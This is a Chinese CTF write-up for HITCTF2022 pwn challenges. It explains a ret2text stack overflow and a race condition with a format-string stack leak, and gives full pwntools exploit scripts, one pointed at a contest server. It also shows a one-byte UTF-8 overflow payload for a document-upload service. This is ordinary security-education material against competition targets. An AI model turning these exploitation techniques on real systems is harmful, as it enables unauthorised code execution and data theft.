安天杯-HITCTF2022

Posted on Edited on
比赛
1
2
3
4
5
ret2text,条件竞争,一字节溢出

        

C:\blog\source\_posts\安天杯-HITCTF2022\

pwn

pwn_easy(pwn1:ret2text)

1、分析程序逻辑

image-20221201163200300

main函数调用func,传入a1值-559038737,func函数中若a1为-889275714则可进入password函数,可以看到func中的gets、password中的read都是溢出点

结合二进制文件自带的system函数与/bin/sh字符串即可getshell

image-20221201164402868

2、exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
##!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

#context(arch="i386",os="linux",log_level="debug")

io = process('pwn_easy')

sys_plt = 0x080490E0  
bin_sh = 0x0804a008

payload = 40*'a' 
payload += p32(0xdeadbeef) 
payload += p32(sys_plt)    # ret
payload += p32(0xcafebabe) # 修改a1,这里是为了进入password函数
                           # 但进不进不重要,我打的是func里的gets函数
payload += p32(bin_sh)

io.sendlineafter('Please input your username:',payload)

io.interactive()


time(pwn2:条件竞争)

1、程序逻辑分析

image-20221201172741566

image-20221201184103971

以上分析中我们可以看出 check_file_name 函数中的 is_secret_file 是全局变量,所有子线程都会访问并改变该变量。现考虑以下条件竞争情况:

image-20221201194409238

线程1本来a1为1,is_secret_file为1,file_name为”flag.txt”,是不满足进入dispaly_file_content()这一 分支中的。但是由于有多个线程,且is_secret_file是共享变量。如果线程2此时正好运行到将 is_secret_file赋值为0这里。当再次切换回到线程1时,由于is_secret_file为0,进入 dispaly_file_content()这一分支。此时就会读取”flag.txt”继续处理。

虽然直接打印出来的内容是MD5哈希过的,根据这个内容无法恢复出原本的flag内容

但是,在dispaly_file_content()函数中,可以看到会将flag.txt的内容拷贝到栈上

image-20221201195117932

于是结合初始的输入的全局变量值 gloabl_name 处存在的格式化字符串漏洞将栈上的信息打印出来(%p)

image-20221201195550630

2、exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
# context(arch="i386",os="linux",log_level="debug")
context(arch="i386",os="linux",log_level="error")
# io = process('./time')
io = remote("122.114.225.151",10000)

io.sendlineafter("Who are you?",b"%p "*80) # gloabl_name

io.sendlineafter("2.old_flag.txt",b"1") # check_file_name()

io.sendline(b"1")
io.sendline(b"1")
io.sendline(b"1")

io.sendline(b"2")

sleep(1)
io.recvuntil("2.old_flag.txt")
io.sendline(b"1")
io.sendline(b"1")
io.interactive()

image-20221201200646593

1
2
3
4
5
6
7
8
9
10
11
#解析脚本
from pwn import *

a = [0x3032465443544948, 0x2d656d69747b3232, 0x6c69662d612d7369,0x772d746168742d65, 0x646e612d73726165, 0x6e2d73656b616d2d, 0x7d6573696f6e2d6f,0xa]

result = b""

for i in a:
    result += p64(i)
    
print(result)

image-20221201201025443



doc(pwn3:一字节溢出)

结合网页页面提示与ida反编译代码

image-20221211193100827

image-20221211192954412

image-20221211193217859

image-20221211193300213

        通过web页面的提示,了解了web页面的执行流程:用户可通过 /doc/upload 上传一个文件,通过 /doc/ls 查看当前全部文件,通过 /doc/extract 查看文件内容,通过 /doc/extract_many 查看多个文件内容。

image-20221211193432756

image-20221211193448481

        又根据web页面中flag的 mode:FORBIDDEN 这一提示,得到一个解题思路:修改flag的mode为ALLOW使其可读。既然反编译代码中出现了extract与extract_many这俩同名函数,那我们就从这俩函数着重审起,最后在审计extract_many函数的过程中发现get_utf8_text中的strencodencpy函数在边界上会溢出一个字节。

image-20221211221924954

image-20221211221946283

而mode值不为0即可被视为ALLOW

image-20221211222013583

最后由utf-8 4bytes字符第四字节值范围可知随机挑选一个字符放在最后即可

image-20221211222058716

image-20221211222109375

最后上传的doc文档中的内容

1
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈𒀐哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈

image-20221211222146832